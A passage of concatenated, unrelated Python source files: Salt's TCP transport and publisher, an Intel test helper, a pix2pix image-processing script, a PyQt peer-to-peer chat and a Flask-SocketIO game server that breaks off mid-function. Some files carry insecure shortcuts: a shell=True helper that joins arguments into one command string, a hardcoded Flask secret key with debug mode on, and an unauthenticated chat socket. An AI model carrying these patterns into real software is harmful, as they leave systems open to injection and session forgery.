self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (self.io_loop != tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop()
)
self.io_loop.start()
except Exception as e:
log.info('Exception caught in SaltMessageClient.close: %s', str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {'source_ip': self.source_ip,
'source_port': self.source_port}
else:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
**kwargs)
self._connecting_future.set_result(True)
break
except Exception as exc:
log.warn('TCP Message Client encountered an exception %r', exc)
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get('log_queue')
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get('log_queue_level')
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual asynchronous interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list' and not self.opts.get("order_masters", False):
if isinstance(load['tgt'], six.string_types):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
else:
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
helpers.py | # Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from intel import util
import copy
import os
import random
import string
import subprocess
from threading import Thread
# Returns the absolute path to the test config directory with the supplied
# name.
def conf_dir(name):
return os.path.join(util.cmk_root(), "tests", "data", "config", name)
# Returns the absolute path to the test procfs directory with the supplied
# name.
def procfs_dir(name):
return os.path.join(
util.cmk_root(), "tests", "data", "sysfs", name, "proc")
def sysfs_dir(name):
return os.path.join(util.cmk_root(), "tests", "data", "sysfs", name)
def rand_str(length=8, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for c in range(length))
# Returns resulting stdout buffer from interpreting the supplied command with
# a shell. Raises process errors if the command exits nonzero.
def execute(cmd, args=[], env={}):
cmd_str = "{} {}".format(cmd, " ".join(args))
host_env = copy.deepcopy(os.environ)
host_env.update(env)
stdout = subprocess.check_output(
cmd_str, shell=True, stderr=subprocess.STDOUT, env=host_env)
return stdout
def background(f):
return BackgroundContext(f)
class BackgroundContext:
def __init__(self, f):
self.t = Thread(target=f)
def __enter__(self):
self.t.start()
return self.t
def __exit__(self, type, value, traceback):
pass
|
process.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", help="path to folder containing images",default='E:\download\COCO\\train2014\\train2014Resize')
parser.add_argument("--output_dir", help="output path",default='E:\download\COCO\\train2014\\train2014Combined')
parser.add_argument("--operation", choices=["grayscale", "resize", "blank", "combine", "edges", "blur"],default='combine')
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation",default='E:\download\COCO\\train2014\\train2014Blur')
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size, offset:offset + size, :] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:, :, :3]
if sibling.shape[2] == 4:
sibling = sibling[:, :, :3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
def blur(src, scale=4):
height, width, _ = src.shape
height_down = height // scale
width_down = width // scale
dst = im.downscale(images=src, size=[height_down, width_down])
dst = im.upscale(images=dst, size=[height, width])
return dst
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0, :, :]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:, :, :3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0, 0)), "reflect")
src = src[:, :, ::-1]
src -= np.array((104.00698793, 116.66876762, 122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0 / 255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
elif a.operation == "blur":
dst = blur(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
|
P2P.py | import socket
import threading
import inspect
import ctypes
from ConnectServer import DEBUG_MODE
from PyQt5.QtCore import pyqtSignal, QObject
# def _async_raise(tid, exctype):
# tid = ctypes.c_long(tid)
# if not inspect.isclass(exctype):
# exctype = type(exctype)
# res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
# if res == 0:
# raise ValueError("invalid thread id")
# elif res != 1:
# ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
# raise SystemError("PyThreadState_SetAsyncExc failed")
# def stop_thread(thread):
# _async_raise(thread.ident, SystemExit)
class Server(QObject):
showMsgByIdSignal = pyqtSignal(str)
setOfflineSignal = pyqtSignal(str)
setOnlineSignal = pyqtSignal(str)
def __init__(self, port, id, textBrowser_msg):
super().__init__()
self.connections = []
self.addresses = []
self.src_ids = []
self.id = id
self.msgRecords = []
self.textBrowser_msg = textBrowser_msg
self.curMsgId = ""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('0.0.0.0', port))
self.sock.listen(5)
listenConnectionThread = threading.Thread(target=self.listenConnection)
listenConnectionThread.daemon = True
listenConnectionThread.start()
if DEBUG_MODE:
print("Server running ...")
def __del__(self):
for c in self.connections:
c.close()
def listenConnection(self):
while True:
c, a = self.sock.accept()
if DEBUG_MODE:
print(str(a[0]) + ':' + str(a[1]), "connected")
listenThread = threading.Thread(target=self.listenMsg, args=(c, a))
listenThread.daemon = True
listenThread.start()
self.connections.append(c)
self.addresses.append(a)
self.msgRecords.append("")
def listenMsg(self, c, a):
while True:
try:
data = c.recv(1024)
if not data:
if DEBUG_MODE:
print(str(a[0]) + ':' + str(a[1]), "disconnectd")
idx = self.connections.index(c)
self.setOfflineSignal.emit(self.src_ids[idx])
self.src_ids.remove(self.src_ids[idx])
self.msgRecords.remove(self.msgRecords[idx])
self.connections.remove(c)
self.addresses.remove(a)
c.close()
break
data = data.decode("utf-8")
if data[:10] not in self.src_ids:
self.src_ids.append(data[:10])
self.setOnlineSignal.emit(data[:10])
data = data[10:]
if data != "":
idx = self.connections.index(c)
if self.msgRecords[idx] != "":
self.msgRecords[idx] += "\n"+ self.src_ids[idx] + ": " + data
else:
self.msgRecords[idx] += self.src_ids[idx] + ": " + data
if self.src_ids[idx] == self.curMsgId:
self.showMsgByIdSignal.emit(self.curMsgId)
except Exception as e:
if DEBUG_MODE:
print(e)
print(str(a[0]) + ':' + str(a[1]), "disconnectd")
idx = self.connections.index(c)
self.setOfflineSignal.emit(self.src_ids[idx])
self.src_ids.remove(self.src_ids[idx])
self.msgRecords.remove(self.msgRecords[idx])
self.connections.remove(c)
self.addresses.remove(a)
c.close()
break
def sendMsg(self, client_id, msg):
idx = self.src_ids.index(client_id) if (client_id in self.src_ids) else -1
if self.msgRecords[idx] != "":
self.msgRecords[idx] += "\n"+ self.id + ": " + msg
else:
self.msgRecords[idx] += self.id + ": " + msg
c = self.connections[idx]
c.sendall(msg.encode("utf-8"))
self.showMsgByIdSignal.emit(client_id)
def showMsgById(self, client_id):
idx = self.src_ids.index(client_id) if (client_id in self.src_ids) else -1
self.textBrowser_msg.setText(self.msgRecords[idx])
def setCurMsgId(self, id):
self.curMsgId = id
if id in self.src_ids:
self.showMsgByIdSignal.emit(id)
class Client(QObject):
showRecordSignal = pyqtSignal()
removeClientSignal = pyqtSignal()
def __init__(self, dst_ip, dst_port, dst_id, src_id, textBrowser_msg):
super().__init__()
self.record = ""
self.src_id = src_id
self.dst_id = dst_id
self.dst_ip = dst_ip
self.dst_port = dst_port
self.textBrowser_msg = textBrowser_msg
self.curMsgId = ""
self.toUpdate = False
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.connect((dst_ip, dst_port))
self.listenThread = threading.Thread(target=self.listenMsg, args=(self.textBrowser_msg, self.record))
self.listenThread.daemon = True
self.listenThread.start()
self.sock.send(self.src_id.encode("utf-8"))
def __del__(self):
self.sock.close()
def listenMsg(self, textBrowser_msg, record):
while True:
try:
data = self.sock.recv(1024)
if not data:
self.sock.close()
self.removeClientSignal.emit()
break
data = data.decode("utf-8")
if self.record != "":
self.record += "\n"+ self.dst_id + ": " + data
else:
self.record += self.dst_id + ": " + data
if self.dst_id == self.curMsgId:
self.showRecordSignal.emit()
except Exception as e:
if DEBUG_MODE:
print(e)
self.removeClientSignal.emit()
self.sock.close()
break
def sendMsg(self, msg):
if self.record != "":
self.record += "\n"+ self.src_id + ": " + msg
else:
self.record += self.src_id + ": " + msg
msg = self.src_id + msg
self.sock.sendall(msg.encode("utf-8"))
self.showRecordSignal.emit()
def showRecord(self):
self.textBrowser_msg.setText(self.record)
def setCurMsgId(self, id):
self.curMsgId = id
if id == self.dst_id:
self.showRecordSignal.emit()
|
app.py | import time
from threading import Thread
from flask import Flask, render_template, session
from flask.ext.socketio import SocketIO, emit, disconnect
from flask_debugtoolbar import DebugToolbarExtension
from src.game import Game
from gevent import monkey
monkey.patch_all()
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
app.debug = True
socketio = SocketIO(app)
thread = None
toolbar = DebugToolbarExtension(app)
GAMES = {}
def background_thread():
"""Example of how to send server generated events to clients."""
count = 0
while True:
time.sleep(10)
count += 1
socketio.emit('my response',
{'data': 'Server generated event', 'count': count},
namespace='/api')
@socketio.on('newgame', namespace='/api')
def newgame(message):
message['data'] = "Game started"
game = Game(players=['player1', 'player2'])
GAMES[game.id] = game
# session['player_id'] = message.get('player_id')
# session['game_id'] = 1
session['receive_count'] = session.get('receive_count', 0) + 1
emit('my response',
{'data': str(game), 'count': session['receive_count']})
@app.route('/load')
def load():
return render_template('index.html')
@app.route('/')
def index():
global thread
if thread is None:
thread = Thread(target=background_thread)
thread.start()
return render_template('index.html')
@socketio.on('my event', namespace='/api')
def test_message(message):
session['receive_count'] = session.get('receive_count', 0) + 1
emit('my response',
{'data': message['data'], 'count': session['receive_count']})
@socketio.on('my broadcast event', namespace='/api')
def test_broadcast_message(message):
session['receive_count'] = session.get('receive_count', 0) + 1
emit('my response',
{'data': message['data'], 'count': session['receive_count']},
broadcast=True)
@socketio.on('disconnect request', namespace='/api')
def disconnect_request():
session['receive_count'] = session.get('receive_count', 0) + 1
emit('my response',
